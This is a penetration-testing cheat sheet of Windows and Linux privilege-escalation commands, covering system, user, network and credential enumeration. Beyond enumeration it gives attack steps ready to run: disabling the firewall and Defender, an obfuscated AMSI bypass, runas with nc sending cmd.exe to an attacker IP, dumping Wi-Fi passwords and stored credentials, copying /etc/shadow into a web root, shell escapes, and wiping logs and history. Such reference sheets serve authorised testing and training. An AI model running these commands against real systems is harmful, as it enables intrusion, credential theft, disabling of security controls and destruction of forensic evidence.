Windows Privilege Escalation

Windows Local Privilege Escalation

==System Info==
#Windows Version and Configuration
::OS Version::
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

::Extract patches and updates::
wmic qfe

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

::List all env variables::
Get-ChildItem Env: | ft Key,Value

::List all drives::
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
==Users & Groups Enumeration==
::Get current username::
echo %USERNAME% || whoami

::List user privilege::
whoami /priv
whoami /groups

::List all users::
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

::List logon requirements; usable for bruteforcing::
net accounts

::Get details about a user (i.e. administrator, admin, current user)::
net user administrator
net user admin
net user %USERNAME%
::List all local groups::

net localgroup
Get-LocalGroup | ft Name

::Get details about a group (i.e. administrators)::
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

==Network Enumeration==
::List all network interfaces, IP, and DNS.::
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

::Hosts file::
type C:\Windows\System32\drivers\etc\hosts

::List current routing table::
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

::List the ARP table::
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

::List all current connections::
netstat -ano

::List firewall state and current configuration::
netsh advfirewall firewall dump


netsh firewall show state
netsh firewall show config

::List firewall's blocked ports::
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

::Disable firewall & Defender::
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

::List all network shares::
net share

::SNMP Configuration::
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

==Windows Defender==
::Check the status of Defender::
PS C:\> Get-MpComputerStatus

::Disable Real Time Monitoring::
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true

sc config WinDefend start= disabled
sc stop WinDefend

==AppLocker Enumeration==
::List of AppLocker rules::
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective

C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

::Default PowerShell locations in a Windows system.::

::Example of AMSI Bypass.::
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

::Powershell history::
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\TheShahzada\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

::Password in Alternate Data Stream::
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

==Processes Enumeration and Tasks==
::What processes are running?::

tasklist /v
net start
sc query
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

::Which processes are running as "system"?::
tasklist /v /fi "username eq system"

::Do you have powershell magic?::
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

::List installed programs::
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

::List services::
net start
wmic service list brief
tasklist /SVC

::Scheduled tasks::

schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

::Startup tasks::

#wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

==Windows Credentials==
::Winlogon Credentials::
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

/* Use the cmdkey to list the stored credentials on the machine. */
cmdkey /list
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator

/* Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share */
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

/* Using runas with a provided set of credential. */
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

/* In theory, the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

The DPAPI key is stored in the same file as the master key that protects the user's private keys. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it using dir from the cmd, but you can list it from PS). */

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

/* You can use mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credentials files protected by the master password are usually located in: */
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

::Saved RDP Connections::
HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
HKCU\Software\Microsoft\Terminal Server Client\Servers\

::Recently Run Commands::

::Remote Desktop Credential Manager::
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
/* Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module */

==Files and Registry (Credentials)==

::Putty Creds::
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

::Putty SSH Host Keys::
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

::SSH keys in registry::
reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys

/* If ssh-agent service is not running and you want it to automatically start on boot run: */
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

::Cloud Credentials::
##From user home

::SAM & SYSTEM backups::
# Usually %SYSTEMROOT% = C:\Windows

::Unattended files::
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

::IIS Web Config::
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue


Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

/* Example of web.config with credentials: */
<authentication mode="Forms"> 
    <forms name="login" loginUrl="/admin">
        <credentials passwordFormat = "Clear">
            <user name="Administrator" password="SuperAdminPassword" />

==Write Permissions==

/* Check if you can modify some config file to read some special file, or if you can modify some binary that is going to be executed by an Administrator account (schtasks).
A way to find weak folder/files permissions in the system is doing: */
accesschk.exe /accepteula 
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} 

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Note: To be continued...


Linux Privilege Escalation

Linux Enumeration for Escalation to Root Access

  === Operating System ===

## What's the distribution type? What version?

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

cat /etc/redhat-release


uname -n   // System hostname

hostname // As above

## What's the Kernel version? Is it 64-bit?

cat /proc/version   

uname -a

uname -r  // Kernel release

uname -mrs 

rpm -q kernel 

dmesg | grep Linux

ls /boot | grep vmlinuz-

cat /proc/cpuinfo   // CPU information

  === What can be learnt from the environmental variables? ===

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout



  === Is there a printer? ===

lpstat -a

  === Users & Groups: === 

cat /etc/passwd  

cat /etc/group   // List all groups on the system

cat /etc/shadow  // Show user hashes – Privileged command

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List all super user accounts

finger   // Users currently logged in

pinky   // As above

users  // As above

who -a // As above

w   // Who is currently logged in and what they’re doing

last   // Listing of last logged on users

lastlog   // Information on when all users last logged in

lastlog --user root // Information on when the specified user last logged in

  === User & Privilege Information: ===



cat /etc/sudoers  // Who’s allowed to do what as root – Privileged command

sudo -l  // Can the current user perform anything as root

cat /etc/passwd | cut -d: -f1    # List of users

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users

awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users

cat /etc/sudoers

## What has the user been doing? Is there any password in plain text? What have they been editing?

cat ~/.bash_history

cat ~/.nano_history

cat ~/.atftp_history

cat ~/.mysql_history 

cat ~/.php_history

What user information can be found? 

cat ~/.bashrc

cat ~/.profile

cat /var/mail/root

cat /var/spool/mail/root

## Which service(s) are being run by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root

ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archives

ls -alh /var/cache/yum/ 

  === Environmental Information: ===

env  // Display environmental variables

set  // As above

echo $PATH  // Path information

history // Displays the command history of the current user

cat /etc/profile // Display default system variables

## Which service(s) are being run by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root

ps -ef | grep root

    === What applications are installed? What version are they? Are they currently running? ===

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archives

ls -alh /var/cache/yum/ 

    === Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? ===

cat /etc/syslog.conf 

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf 

cat /etc/inetd.conf 

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

ps aux | grep root  // View services running as root

cat /etc/inetd.conf  // List services managed by inetd

cat /etc/xinetd.conf // As above for xinetd

    === Installed programs === 

dpkg -l Installed packages (Debian)

rpm -qa Installed packages (Red Hat)

sudo -V Sudo version – does an exploit exist?

httpd -v Apache version

apache2 -v As above

apache2ctl (or apachectl) -M List loaded Apache modules

mysql --version Installed MYSQL version details

perl -v Installed Perl version details

java -version Installed Java version details

python --version Installed Python version details

ruby -v Installed Ruby version details

find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc)

which %program_name% (i.e. nc, netcat, wget, nmap etc) As above

    === SSH info ? ===

## Can private-key information be found? 

cat ~/.ssh/authorized_keys

cat ~/.ssh/identity.pub

cat ~/.ssh/identity

cat ~/.ssh/id_rsa.pub

cat ~/.ssh/id_rsa

cat ~/.ssh/id_dsa.pub

cat ~/.ssh/id_dsa

cat /etc/ssh/ssh_config

cat /etc/ssh/sshd_config

cat /etc/ssh/ssh_host_dsa_key.pub

cat /etc/ssh/ssh_host_dsa_key

cat /etc/ssh/ssh_host_rsa_key.pub

cat /etc/ssh/ssh_host_rsa_key

cat /etc/ssh/ssh_host_key.pub

cat /etc/ssh/ssh_host_key

  === Jobs/Tasks: ===

crontab -l -u %username% // Display scheduled jobs for the specified user – Privileged command

ls -la /etc/cron* // Scheduled jobs overview (hourly, daily, monthly etc)

ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null // What can ‘others’ write in /etc/cron* directories

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

ls -alh  /etc/cron.daily

ls -alh  /etc/cron.weekly

ls -alh  /etc/cron.monthly

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

    === Interesting Files: ===

find /home -name .rhosts -print 2>/dev/null // Find rhost config files

ls -ahlR /root/     // See if you can access other user directories to find interesting files – Privileged command

cat ~/.bash_history // Show the current users’ command history

ls -la ~/.*_history // Show the current user's various history files

ls -la ~/.ssh/ // Check for interesting ssh files in the current user's directory

ls -la /usr/sbin/in.* // Check Configuration of inetd services

find /var/log -type f -exec ls -la {} \; 2>/dev/null // List files in specified directory (/var/log)

find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null // List .log files in specified directory (/var/log)

find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null // List .conf files in /etc (recursive 1 level)

ls -la /etc/*.conf // As above

lsof -i -n  ## List open files (output will depend on account privileges)

lsof -u root  ## lists all open files and processes by user root

## Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone

ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner

ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group

ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone

find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone 

## Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null        # world-writable folders

find / -perm -222 -type d 2>/dev/null      # world-writable folders

find / -perm -o+w -type d 2>/dev/null    # world-writable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writable & executable folders

## Any "problem" files? World-writable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable directories without the sticky bit

find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

## What sensitive files can be found? 

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

## Anything "interesting" in the home directory(ies)? If it's possible to access

ls -ahlR /root/

ls -ahlR /home/

## What can be found in /var/ ? 

ls -alh /var/log

ls -alh /var/mail

ls -alh /var/spool

ls -alh /var/spool/lpd 

ls -alh /var/lib/pgsql

ls -alh /var/lib/mysql

cat /var/lib/dhcp3/dhclient.leases

## Any settings/files (hidden) on website? Any settings file with database information?

ls -alhR /var/www/

ls -alhR /srv/www/htdocs/ 

ls -alhR /usr/local/www/apache22/data/

ls -alhR /opt/lampp/htdocs/ 

ls -alhR /var/www/html/

## Is there anything in the log file(s) (Could help with "Local File Includes"!)

cat /etc/httpd/logs/access_log

cat /etc/httpd/logs/access.log

cat /etc/httpd/logs/error_log

cat /etc/httpd/logs/error.log

cat /var/log/apache2/access_log

cat /var/log/apache2/access.log

cat /var/log/apache2/error_log

cat /var/log/apache2/error.log

cat /var/log/apache/access_log

cat /var/log/apache/access.log

cat /var/log/auth.log

cat /var/log/chttp.log

cat /var/log/cups/error_log

cat /var/log/dpkg.log

cat /var/log/faillog

cat /var/log/httpd/access_log

cat /var/log/httpd/access.log

cat /var/log/httpd/error_log

cat /var/log/httpd/error.log

cat /var/log/lastlog

cat /var/log/lighttpd/access.log

cat /var/log/lighttpd/error.log

cat /var/log/lighttpd/lighttpd.access.log

cat /var/log/lighttpd/lighttpd.error.log

cat /var/log/messages

cat /var/log/secure

cat /var/log/syslog

cat /var/log/wtmp

cat /var/log/xferlog

cat /var/log/yum.log

cat /var/run/utmp

cat /var/webmin/miniserv.log

cat /var/www/logs/access_log

cat /var/www/logs/access.log

ls -alh /var/lib/dhcp3/

ls -alh /var/log/postgresql/

ls -alh /var/log/proftpd/

ls -alh /var/log/samba/

# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.log, mail.warn, messages, syslog, udev, wtmp

## Search for specific strings inside a file

file ./somefile   ## file info

strings ./*.txt | grep password

find / -name "*.log" | xargs grep -i pass

grep -l -i pass /var/log/*.log 2>/dev/null

find / -maxdepth 10 -name "*.conf" -type f -exec grep -Hn pass {} \; 2>/dev/null // searches for the string 'pass' and outputs the line number

find / -maxdepth 10 -name "*etc*" -type f -exec grep -Hn pass {} \; 2>/dev/null  // as above, but in *etc*

grep -l -i pass /var/log/*.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches

find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn password {} \; 2>/dev/null // Find .conf files (recursive 4 levels) and output line number where the word password is located

grep -i user [filename]

grep -i pass [filename]

grep -C 5 "password" [filename]

find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla

hexeditor ./file

objdump -D -M intel ./file

objdump -D -M x86-64 ./file >> dump64.file

cat /var/apache2/

cat /var/lib/mysql/mysql/user.MYD 

cat /root/anaconda-ks.cfg

find / -name "network-secret.txt"

locate "network-secret.txt"


    === Permissions ===

## What "Advanced Linux File Permissions" are used? Sticky bits, SUID & SGID

find / -perm -u=s -type f 2>/dev/null     # Find FILES that have the SUID bit set.

find / -perm -1000 -type d 2>/dev/null    # Find DIRECTORIES w/ Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here

find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID

for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

## Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null        # world-writable folders

find / -perm -222 -type d 2>/dev/null      # world-writable folders

find / -perm -o+w -type d 2>/dev/null    # world-writable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writable & executable folders

## Any "problem" files? World-writable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable directories without the sticky bit

find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files


## We found cp (copy) in the above list and now we are abusing it:

cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt

Few things to keep in mind:

## (1) at the destination, the file owner will be root but the group will be that of the current user and 

## (2) notice the use of "--no-preserve" this is needed to read out protected files.

## A lot of ways we can abuse this, update the shadow file with a new account, modify sudoers, plant ssh key + modify sshd_config ## + reboot,or cron.hourly.

    === File system ===

df -ah   // all FS info, including pseudo, duplicate, INACCESSIBLE file systems

## Are there any unmounted file-systems?

cat /etc/fstab

    === Networking, Routing & Communications: ===

/sbin/ifconfig -a // List all network interfaces

cat /etc/network/interfaces // As above

cat /etc/sysconfig/network 

arp -a Display ARP communications

route Display route information

cat /etc/resolv.conf Show configured DNS server addresses

netstat -antp List all TCP sockets and related PIDs (-p Privileged command)

netstat -anup List all UDP sockets and related PIDs (-p Privileged command)

iptables -L List rules – Privileged command

cat /etc/services View port numbers/services mappings

    === What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? ===

cat /etc/resolv.conf

cat /etc/sysconfig/network

cat /etc/networks

iptables -L



    === Common Shell Escape Sequences: ===

## If commands are limited, can you break out of the "jail" shell?

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh -i

:!bash vi, vim

:set shell=/bin/bash:shell vi, vim

!bash man, more, less

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; find

awk 'BEGIN {system("/bin/bash")}' awk

--interactive nmap

perl -e 'exec "/bin/bash";' Perl 



    === What other users & hosts are communicating with the system? ===

lsof -i 

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

    === Whats cached? IP and/or MAC addresses ===

arp -e


/sbin/route -nee

    === Is packet sniffing possible? What can be seen? Listen to live traffic ===

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

tcpdump tcp dst 80 and tcp dst 21

tcpdump -n dst host -vvv -n -w file.cap

    === Is port forwarding possible? Redirect and interact with traffic from another view ===

# rinetd

# fpipe

FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080: root@    # Local Port

ssh -R 8080: root@    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 80 >backpipe    # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

## Is tunneling possible? Send commands locally, remotely

ssh -D -N [username]@[ip] 

proxychains ifconfig

#copy bash to a new subshell

mount an NFS share from a remote server, copy bash from local to remote and execute

cp -p ./bash /mnt/share/newbash

./newbash -p

    === Preparation & Finding Exploit Code ===

## What development tools/languages are installed/supported?

find / -name perl*

find / -name python*

find / -name gcc* 

find / -name cc

## How can files be uploaded?

find / -name wget

find / -name nc*

find / -name netcat*

find / -name tftp* 

find / -name ftp 

#copy files with SSH

scp username@b:/path/to/file /path/to/destination   //while being logged into A

scp /path/to/file username@a:/path/to/destination  //while being logged into B

#compile C with gcc

gcc ./ajaira_exploit.c -o exploit

#clear history, iptables and logs

iptables -F; history -c; find ./ -name “*.log” |xargs rm -f

# Postfix version

postconf -d | grep mail_vers

To be continued | everything is collected